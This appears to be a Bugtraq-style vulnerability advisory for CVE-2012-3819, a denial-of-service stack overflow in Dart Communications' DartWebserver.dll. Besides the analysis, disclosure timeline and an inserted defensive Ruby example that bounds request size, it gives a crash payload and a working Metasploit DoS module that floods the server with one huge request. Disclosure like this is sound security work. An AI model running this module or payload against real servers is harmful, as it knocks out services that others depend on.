Overview
===============

DartWebserver.Dll is an HTTP server provided by Dart Communications (dart.com). It is distributed in their PowerTCP/Webserver For ActiveX product and likely other similar products.

"Build web applications in any familiar software development environment. Use WebServer for ActiveX to add web-based access to traditional compiled applications."

Version 1.9 and prior is vulnerable to a stack overflow exception, which may be triggered by sending large requests to the application, e.g.

    "a" * 5200000 + "\n\n"

Analysis
===============

During the processing of incoming HTTP requests the server collects data until it encounters a "\n\n" sentinel. If the request is large, multiple copies are made and stored on the stack; this quickly consumes the stack space available to the process, leading to a stack overflow exception being thrown. This exception is not handled and will typically lead to the termination of the parent process. Some variation may exist per system depending on pre-existing memory conditions, and modification of the Proof of Concept (PoC) code may be necessary to reproduce the exception.
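The failure mode described in the analysis is an unbounded read: bytes are accumulated until a blank-line sentinel arrives, with no cap on how much is buffered first. The following is an added example (not code from this advisory and not Dart's product code) showing the defensive pattern in Ruby: a request-head reader that enforces a size limit before it keeps looking for the sentinel, so an oversized request is rejected with a bounded allocation instead of exhausting memory. The limit (MAX_HEAD_BYTES), the chunk size and the terminator set are assumptions chosen for illustration.

```ruby
require 'stringio'

# Assumed cap on the size of an HTTP request head (start line plus headers).
# Real servers typically use values in the 8-16 KiB range; tune per deployment.
MAX_HEAD_BYTES = 8 * 1024
# Both CRLF and bare-LF blank lines are accepted as the end-of-head sentinel,
# mirroring the "\n\n" sentinel described in the analysis.
HEAD_TERMINATORS = ["\r\n\r\n", "\n\n"].freeze

class RequestTooLarge < StandardError; end

# Reads the request head from +io+ in fixed-size chunks. Returns the head
# including its terminator, or raises RequestTooLarge as soon as the buffer
# passes +max_bytes+ without a terminator, so memory use is bounded by the cap
# no matter how large the incoming request is.
def read_request_head(io, max_bytes: MAX_HEAD_BYTES, chunk: 1024)
  buf = String.new(capacity: max_bytes)
  loop do
    part = io.read(chunk)
    raise EOFError, 'connection closed before end of request head' if part.nil?
    buf << part
    # Search the whole buffer, so a terminator split across two chunks is found.
    HEAD_TERMINATORS.each do |term|
      idx = buf.index(term)
      return buf[0, idx + term.bytesize] if idx
    end
    # Check the cap only after the sentinel search, so a head that ends exactly
    # at the limit is still accepted.
    raise RequestTooLarge, "request head exceeds #{max_bytes} bytes" if buf.bytesize > max_bytes
  end
end

# Classifies one connection's request head: :ok when a bounded head was read,
# :rejected when the cap was hit. This is the value a server would log or use
# to return 431/413 and close the connection.
def classify(io)
  read_request_head(io)
  :ok
rescue RequestTooLarge
  :rejected
end

if __FILE__ == $0
  # Constructed sample inputs: a normal request and an oversized one.
  normal = StringIO.new("GET / HTTP/1.1\r\nHost: example.test\r\n\r\nbody")
  huge   = StringIO.new('A' * 20_000 + "\r\n\r\n")
  puts classify(normal)  # => ok
  puts classify(huge)    # => rejected
end
```

The important ordering is that the size check runs on every chunk before more data is read, not once after the sentinel is found; with the unbounded version the cap would only be consulted after the whole request had already been buffered.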
Timeline
===============

10/20/2011 - Discovered the bug in an affected vendor application
10/20/2011 - Contacted affected vendor
10/21/2011 - Affected vendor replies stating they cannot get the product vendor to create a fix
06/29/2012 - CVE assignment
08/08/2012 - Contacted product vendor providing specifics
08/20/2012 - Product vendor created an issue number (#5654) for the bug, but replied "there are no immediate plans to resolve the issue"
09/28/2012 - Posting to bugtraq, for the first time ever ;-)

PoC (MSF Module)
===============

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary

      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Dos

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'Dart Webserver <= 1.9.0 Stack Overflow',
          'Description' => %q{
            Dart Webserver from Dart Communications throws a stack overflow
            exception when processing large requests.
          },
          'Author'      => [ 'catatonicprime' ],
          'Version'     => '$Revision: 15513 $',
          'License'     => MSF_LICENSE,
          'References'  =>
            [
              [ 'CVE', '2012-3819' ],
            ],
          'DisclosureDate' => '9/28/2012'))

        register_options([
          Opt::RPORT(80),
          OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', '520000' ])
        ])
      end

      def run
        # Host:port string for the status output; the port suffix is only
        # added when the target is not on the default HTTP port.
        serverIP = datastore['RHOST']
        if (datastore['RPORT'].to_i != 80)
          serverIP += ":" + datastore['RPORT'].to_s
        end

        size = datastore['SIZE']
        print_status("Crashing the server #{serverIP} ...")

        # One request body of SIZE bytes followed by the blank-line sentinel.
        request = "A" * size + "\r\n\r\n"

        connect
        sock.put(request)
        disconnect
      end
    end